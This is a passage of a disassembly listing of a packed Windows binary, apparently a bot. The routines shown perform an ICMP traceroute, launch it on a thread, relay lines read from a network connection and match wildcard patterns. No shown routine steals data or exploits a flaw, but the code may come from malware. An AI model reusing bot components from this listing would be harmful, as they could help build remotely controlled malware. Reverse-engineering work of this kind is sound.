var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = byte ptr -2B0h
var_10D = byte ptr -10Dh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2F0h
push 2ACh
push [ebp+arg_0]
lea eax, [ebp+var_2B0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movzx eax, byte_41E3A0
test eax, eax
jnz short loc_409E6D
push offset aIcmp_dll ; "ICMP.DLL"
call dword_417054 ; LoadLibraryA
mov dword_41E390, eax
cmp dword_41E390, 0
jnz short loc_409E24
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E24: ; CODE XREF: sub_409DD0+4B�j
push offset aIcmpcreatefile ; "IcmpCreateFile"
push dword_41E390
call dword_417058 ; GetProcAddress
mov dword_41E38C, eax
push offset aIcmpsendecho ; "IcmpSendEcho"
push dword_41E390
call dword_417058 ; GetProcAddress
mov dword_41E398, eax
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push dword_41E390
call dword_417058 ; GetProcAddress
mov dword_41E394, eax
mov byte_41E3A0, 1
loc_409E6D: ; CODE XREF: sub_409DD0+32�j
cmp dword_41E38C, 0
jnz short loc_409E7D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E7D: ; CODE XREF: sub_409DD0+A4�j
cmp dword_41E398, 0
jnz short loc_409E8D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E8D: ; CODE XREF: sub_409DD0+B4�j
cmp dword_41E394, 0
jnz short loc_409E9D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E9D: ; CODE XREF: sub_409DD0+C4�j
lea eax, [ebp+var_10D]
mov [ebp+var_2B8], eax
push [ebp+var_2B8]
call dword_417244 ; inet_addr
mov [ebp+var_2BC], eax
cmp [ebp+var_2BC], 0FFFFFFFFh
jnz short loc_409F18
push [ebp+var_2B8]
call dword_41723C ; gethostbyname
mov [ebp+var_2C0], eax
cmp [ebp+var_2C0], 0
jz short loc_409F06
mov eax, [ebp+var_2C0]
movsx eax, word ptr [eax+0Ah]
push eax
mov eax, [ebp+var_2C0]
mov eax, [eax+0Ch]
push dword ptr [eax]
lea eax, [ebp+var_2BC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
jmp short loc_409F18
; ---------------------------------------------------------------------------
loc_409F06: ; CODE XREF: sub_409DD0+10D�j
push offset aCouldNotResolv ; "Could not resolve name"
call sub_416DD8 ; printf
pop ecx
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409F18: ; CODE XREF: sub_409DD0+F2�j
; sub_409DD0+134�j
and [ebp+var_4], 0
mov byte ptr [ebp+var_2B4], 1
jmp short loc_409F33
; ---------------------------------------------------------------------------
loc_409F25: ; CODE XREF: sub_409DD0:loc_40A19C�j
mov al, byte ptr [ebp+var_2B4]
add al, 1
mov byte ptr [ebp+var_2B4], al
loc_409F33: ; CODE XREF: sub_409DD0+153�j
movzx eax, byte ptr [ebp+var_2B4]
movzx ecx, [ebp+var_D]
cmp eax, ecx
jg loc_40A1A1
cmp [ebp+var_4], 0
jnz loc_40A1A1
and [ebp+var_2EC], 0
or [ebp+var_2E4], 0FFFFFFFFh
and [ebp+var_2E0], 0
and [ebp+var_2DC], 0
and [ebp+var_2D0], 0
and [ebp+var_2C8], 0
and [ebp+var_2CC], 0
and [ebp+var_2D8], 0
and [ebp+var_2D4], 0
jmp short loc_409F9E
; ---------------------------------------------------------------------------
loc_409F91: ; CODE XREF: sub_409DD0:loc_40A04E�j
mov eax, [ebp+var_2D4]
inc eax
mov [ebp+var_2D4], eax
loc_409F9E: ; CODE XREF: sub_409DD0+1BF�j
mov eax, [ebp+var_2D4]
cmp eax, [ebp+var_8]
jnb loc_40A053
cmp [ebp+var_2D8], 0
jnz loc_40A053
push 20h
push [ebp+var_C]
push [ebp+var_2B4]
lea eax, [ebp+var_2CC]
push eax
push [ebp+var_2BC]
call sub_409CB1
add esp, 14h
test eax, eax
jz short loc_40A047
cmp [ebp+var_2CC], 0
jnz short loc_40A02F
mov eax, [ebp+var_2D0]
add eax, [ebp+var_2C4]
mov [ebp+var_2D0], eax
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_2E4]
jnb short loc_40A013
mov eax, [ebp+var_2C4]
mov [ebp+var_2E4], eax
loc_40A013: ; CODE XREF: sub_409DD0+235�j
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_2DC]
jbe short loc_40A02D
mov eax, [ebp+var_2C4]
mov [ebp+var_2DC], eax
loc_40A02D: ; CODE XREF: sub_409DD0+24F�j
jmp short loc_40A045
; ---------------------------------------------------------------------------
loc_40A02F: ; CODE XREF: sub_409DD0+215�j
mov eax, [ebp+var_2CC]
mov [ebp+var_2EC], eax
mov [ebp+var_2D8], 1
loc_40A045: ; CODE XREF: sub_409DD0:loc_40A02D�j
jmp short loc_40A04E
; ---------------------------------------------------------------------------
loc_40A047: ; CODE XREF: sub_409DD0+20C�j
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_40A04E: ; CODE XREF: sub_409DD0:loc_40A045�j
jmp loc_409F91
; ---------------------------------------------------------------------------
loc_40A053: ; CODE XREF: sub_409DD0+1D7�j
; sub_409DD0+1E4�j
mov eax, [ebp+var_2C8]
mov [ebp+var_2E8], eax
cmp [ebp+var_2EC], 0
jnz short loc_40A07B
mov eax, [ebp+var_2D0]
xor edx, edx
div [ebp+var_8]
mov [ebp+var_2E0], eax
jmp short loc_40A090
; ---------------------------------------------------------------------------
loc_40A07B: ; CODE XREF: sub_409DD0+296�j
and [ebp+var_2E4], 0
and [ebp+var_2E0], 0
and [ebp+var_2DC], 0
loc_40A090: ; CODE XREF: sub_409DD0+2A9�j
cmp [ebp+var_2EC], 0
jnz loc_40A165
push 2
push 4
lea eax, [ebp+var_2E8]
push eax
call dword_417220 ; gethostbyaddr
mov [ebp+var_2F0], eax
cmp [ebp+var_2F0], 0
jz short loc_40A115
movzx eax, byte ptr [ebp+var_2E8+3]
push eax
movzx eax, byte ptr [ebp+var_2E8+2]
push eax
movzx eax, byte ptr [ebp+var_2E8+1]
push eax
movzx eax, byte ptr [ebp+var_2E8]
push eax
mov eax, [ebp+var_2F0]
push dword ptr [eax]
push [ebp+var_2DC]
push [ebp+var_2E0]
push [ebp+var_2E4]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419594
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 2Ch
jmp short loc_40A163
; ---------------------------------------------------------------------------
loc_40A115: ; CODE XREF: sub_409DD0+2EB�j
movzx eax, byte ptr [ebp+var_2E8+3]
push eax
movzx eax, byte ptr [ebp+var_2E8+2]
push eax
movzx eax, byte ptr [ebp+var_2E8+1]
push eax
movzx eax, byte ptr [ebp+var_2E8]
push eax
push [ebp+var_2DC]
push [ebp+var_2E0]
push [ebp+var_2E4]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419568
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 28h
loc_40A163: ; CODE XREF: sub_409DD0+343�j
jmp short loc_40A187
; ---------------------------------------------------------------------------
loc_40A165: ; CODE XREF: sub_409DD0+2C7�j
push [ebp+var_2EC]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419540
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 10h
loc_40A187: ; CODE XREF: sub_409DD0:loc_40A163�j
mov eax, [ebp+var_2BC]
cmp eax, [ebp+var_2E8]
jnz short loc_40A19C
mov [ebp+var_4], 1
loc_40A19C: ; CODE XREF: sub_409DD0+3C3�j
jmp loc_409F25
; ---------------------------------------------------------------------------
loc_40A1A1: ; CODE XREF: sub_409DD0+170�j
; sub_409DD0+17A�j
xor eax, eax
locret_40A1A3: ; CODE XREF: sub_409DD0+4F�j
; sub_409DD0+A8�j ...
leave
retn 4
sub_409DD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A1A7 proc near ; CODE XREF: sub_40A9CF+FAE�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
cmp [ebp+arg_4], 0
jnz short loc_40A1C7
push offset unk_419618
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
jmp locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A1C7: ; CODE XREF: sub_40A1A7+A�j
push 2ACh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A1E0
jmp locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A1E0: ; CODE XREF: sub_40A1A7+32�j
push 1A3h
push [ebp+arg_0]
push [ebp+var_4]
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 1A3h
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_40A22A
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
cmp eax, 0FFh
jg short loc_40A22A
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_10], eax
jmp short loc_40A231
; ---------------------------------------------------------------------------
loc_40A22A: ; CODE XREF: sub_40A1A7+63�j
; sub_40A1A7+73�j
mov [ebp+var_10], 1Eh
loc_40A231: ; CODE XREF: sub_40A1A7+81�j
mov eax, [ebp+var_4]
mov cl, byte ptr [ebp+var_10]
mov [eax+2A3h], cl
cmp [ebp+arg_C], 0
jz short loc_40A261
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
cmp eax, 927C0h
jg short loc_40A261
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_14], eax
jmp short loc_40A268
; ---------------------------------------------------------------------------
loc_40A261: ; CODE XREF: sub_40A1A7+9A�j
; sub_40A1A7+AA�j
mov [ebp+var_14], 7530h
loc_40A268: ; CODE XREF: sub_40A1A7+B8�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_14]
mov [eax+2A4h], ecx
cmp [ebp+arg_10], 0
jz short loc_40A288
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_18], eax
jmp short loc_40A28F
; ---------------------------------------------------------------------------
loc_40A288: ; CODE XREF: sub_40A1A7+D1�j
mov [ebp+var_18], 3
loc_40A28F: ; CODE XREF: sub_40A1A7+DF�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_18]
mov [eax+2A8h], ecx
lea eax, [ebp+var_C]
push eax
push 0
push [ebp+var_4]
push offset sub_409DD0
push 0
push 0
call dword_4170B4 ; CreateThread
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40A2C7
push [ebp+var_4]
call sub_416B4C ; free
pop ecx
jmp short locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A2C7: ; CODE XREF: sub_40A1A7+113�j
push [ebp+var_8]
call dword_4170A4 ; CloseHandle
locret_40A2D0: ; CODE XREF: sub_40A1A7+1B�j
; sub_40A1A7+34�j ...
leave
retn
sub_40A1A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A2D2 proc near ; CODE XREF: sub_40A4A4+30�p
var_111C = dword ptr -111Ch
var_1118 = dword ptr -1118h
var_1114 = byte ptr -1114h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 111Ch
call sub_416BC0
mov eax, [ebp+arg_0]
add eax, 4
push eax
mov eax, [ebp+arg_0]
add eax, 104h
push eax
mov eax, [ebp+arg_0]
mov eax, [eax]
push dword ptr [eax]
push offset dword_41966C
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
add esp, 14h
push 2710h
push 0
push offset dword_419668
mov eax, [ebp+arg_0]
add eax, 104h
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40A339
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A339: ; CODE XREF: sub_40A2D2+5E�j
mov eax, [ebp+arg_0]
add eax, 4
push eax
push offset dword_419660
lea eax, [ebp+var_114]
push eax
call dword_4171E0 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_114]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
push eax
lea eax, [ebp+var_114]
push eax
push [ebp+var_8]
call sub_4053BF
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A38F
push [ebp+var_8]
call sub_40538D
pop ecx
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A38F: ; CODE XREF: sub_40A2D2+AB�j
push 1000h
lea eax, [ebp+var_1114]
push eax
push [ebp+var_8]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_40A3B5
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_40A3C5
loc_40A3B5: ; CODE XREF: sub_40A2D2+DB�j
push [ebp+var_8]
call sub_40538D
pop ecx
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A3C5: ; CODE XREF: sub_40A2D2+E1�j
lea eax, [ebp+var_1114]
mov [ebp+var_10], eax
loc_40A3CE: ; CODE XREF: sub_40A2D2:loc_40A492�j
mov eax, [ebp+var_10]
mov [ebp+var_111C], eax
mov eax, [ebp+var_111C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A3E9
jmp loc_40A497
; ---------------------------------------------------------------------------
loc_40A3E9: ; CODE XREF: sub_40A2D2+110�j
push [ebp+var_111C]
call sub_407B5E
pop ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_111C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40A41B
push offset dword_418F4C
push [ebp+var_111C]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40A442
loc_40A41B: ; CODE XREF: sub_40A2D2+131�j
mov eax, [ebp+var_111C]
lea ecx, [ebp+var_1114]
cmp eax, ecx
jz short loc_40A440
push offset dword_41965C
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
pop ecx
pop ecx
loc_40A440: ; CODE XREF: sub_40A2D2+157�j
jmp short loc_40A458
; ---------------------------------------------------------------------------
loc_40A442: ; CODE XREF: sub_40A2D2+147�j
push [ebp+var_111C]
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
pop ecx
pop ecx
loc_40A458: ; CODE XREF: sub_40A2D2:loc_40A440�j
push 3E8h
call dword_41709C ; Sleep
push offset dword_41E368
call sub_409C6C
pop ecx
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax+4]
mov [ebp+var_1118], eax
push offset dword_41E368
call sub_409C7A
pop ecx
cmp [ebp+var_1118], 0
jz short loc_40A492
jmp short loc_40A497
; ---------------------------------------------------------------------------
loc_40A492: ; CODE XREF: sub_40A2D2+1BC�j
jmp loc_40A3CE
; ---------------------------------------------------------------------------
loc_40A497: ; CODE XREF: sub_40A2D2+112�j
; sub_40A2D2+1BE�j
push [ebp+var_8]
call sub_40538D
pop ecx
mov al, 1
locret_40A4A2: ; CODE XREF: sub_40A2D2+62�j
; sub_40A2D2+B8�j ...
leave
retn
sub_40A2D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A4A4 proc near ; DATA XREF: sub_40A50E+A1�o
var_3A8 = dword ptr -3A8h
var_2A4 = byte ptr -2A4h
var_1A4 = byte ptr -1A4h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3A8h
push 3A7h
push [ebp+arg_0]
lea eax, [ebp+var_3A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_3A8]
push eax
call sub_40A2D2
pop ecx
movzx eax, al
test eax, eax
jnz short loc_40A4FC
lea eax, [ebp+var_2A4]
push eax
push offset dword_419698
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40A4FC: ; CODE XREF: sub_40A4A4+3B�j
push [ebp+var_3A8]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40A4A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A50E proc near ; CODE XREF: sub_40A9CF+FE3�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_40A51D
jmp locret_40A5BC
; ---------------------------------------------------------------------------
loc_40A51D: ; CODE XREF: sub_40A50E+8�j
push 3A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A536
jmp locret_40A5BC
; ---------------------------------------------------------------------------
loc_40A536: ; CODE XREF: sub_40A50E+21�j
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_40A562
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40A586
; ---------------------------------------------------------------------------
loc_40A562: ; CODE XREF: sub_40A50E+3D�j
push offset dword_4196D4
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_4105FB
pop ecx
loc_40A586: ; CODE XREF: sub_40A50E+52�j
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 204h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_4196B4
push 0
push [ebp+var_4]
push offset sub_40A4A4
call sub_4095A4
add esp, 18h
locret_40A5BC: ; CODE XREF: sub_40A50E+A�j
; sub_40A50E+23�j
leave
retn
sub_40A50E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A5BE proc near ; CODE XREF: sub_40A5BE+32�p
; sub_40A5BE+70�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A603
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A5DD
mov al, 1
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A5DD: ; CODE XREF: sub_40A5BE+16�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A5FC
mov eax, [ebp+arg_4]
inc eax
push eax
push [ebp+arg_0]
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A5FC: ; CODE XREF: sub_40A5BE+28�j
xor al, al
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A603: ; CODE XREF: sub_40A5BE+C�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A614
xor al, al
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A614: ; CODE XREF: sub_40A5BE+4D�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A63A
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A63A: ; CODE XREF: sub_40A5BE+64�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40A65B
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A65B: ; CODE XREF: sub_40A5BE+85�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A69E
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_40A67C
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 39h
jle short loc_40A687
loc_40A67C: ; CODE XREF: sub_40A5BE+B1�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A69A
loc_40A687: ; CODE XREF: sub_40A5BE+BC�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A69A: ; CODE XREF: sub_40A5BE+C7�j
xor al, al
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A69E: ; CODE XREF: sub_40A5BE+A6�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A6E7
and [ebp+var_4], 0
jmp short loc_40A6B6
; ---------------------------------------------------------------------------
loc_40A6AF: ; CODE XREF: sub_40A5BE:loc_40A6E5�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40A6B6: ; CODE XREF: sub_40A5BE+EF�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call sub_40A5BE
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40A6D4
mov al, 1
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A6D4: ; CODE XREF: sub_40A5BE+110�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A6E5
xor al, al
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A6E5: ; CODE XREF: sub_40A5BE+121�j
jmp short loc_40A6AF
; ---------------------------------------------------------------------------
loc_40A6E7: ; CODE XREF: sub_40A5BE+E9�j
xor al, al
locret_40A6E9: ; CODE XREF: sub_40A5BE+1A�j
; sub_40A5BE+39�j ...
leave
retn
sub_40A5BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A6EB proc near ; CODE XREF: sub_4097A7+10A�p
; sub_4098F3+155�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A730
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A70A
mov al, 1
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A70A: ; CODE XREF: sub_40A6EB+16�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A729
mov eax, [ebp+arg_4]
inc eax
push eax
push [ebp+arg_0]
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A729: ; CODE XREF: sub_40A6EB+28�j
xor al, al
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A730: ; CODE XREF: sub_40A6EB+C�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A741
xor al, al
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A741: ; CODE XREF: sub_40A6EB+4D�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A767
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A767: ; CODE XREF: sub_40A6EB+64�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 41h
jl short loc_40A77D
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 5Ah
jle short loc_40A793
loc_40A77D: ; CODE XREF: sub_40A6EB+85�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 61h
jl short loc_40A7BC
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 7Ah
jg short loc_40A7BC
loc_40A793: ; CODE XREF: sub_40A6EB+90�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
xor eax, 20h
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A7BC
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A7BC: ; CODE XREF: sub_40A6EB+9B�j
; sub_40A6EB+A6�j ...
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40A7DD
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A7DD: ; CODE XREF: sub_40A6EB+DA�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A820
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_40A7FE
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 39h
jle short loc_40A809
loc_40A7FE: ; CODE XREF: sub_40A6EB+106�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A81C
loc_40A809: ; CODE XREF: sub_40A6EB+111�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A81C: ; CODE XREF: sub_40A6EB+11C�j
xor al, al
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A820: ; CODE XREF: sub_40A6EB+FB�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A869
and [ebp+var_4], 0
jmp short loc_40A838
; ---------------------------------------------------------------------------
loc_40A831: ; CODE XREF: sub_40A6EB:loc_40A867�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40A838: ; CODE XREF: sub_40A6EB+144�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40A856
mov al, 1
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A856: ; CODE XREF: sub_40A6EB+165�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A867
xor al, al
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A867: ; CODE XREF: sub_40A6EB+176�j
jmp short loc_40A831
; ---------------------------------------------------------------------------
loc_40A869: ; CODE XREF: sub_40A6EB+13E�j
xor al, al
locret_40A86B: ; CODE XREF: sub_40A6EB+1A�j
; sub_40A6EB+39�j ...
leave
retn
sub_40A6EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A86D proc near ; CODE XREF: sub_40A8AD+FD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_4], 1
cmp [ebp+arg_4], 0
jnz short loc_40A884
push 1
pop eax
jmp short locret_40A8AB
; ---------------------------------------------------------------------------
loc_40A884: ; CODE XREF: sub_40A86D+10�j
mov [ebp+var_8], 1
jmp short loc_40A894
; ---------------------------------------------------------------------------
loc_40A88D: ; CODE XREF: sub_40A86D+39�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40A894: ; CODE XREF: sub_40A86D+1E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
loc_40A89A: ; DATA XREF: .packed:0041AE78�o
; .packed:0041AEBC�o ...
jg short loc_40A8A8
mov eax, [ebp+var_4]
imul eax, [ebp+arg_0]
mov [ebp+var_4], eax
jmp short loc_40A88D
; ---------------------------------------------------------------------------
loc_40A8A8: ; CODE XREF: sub_40A86D:loc_40A89A�j
mov eax, [ebp+var_4]
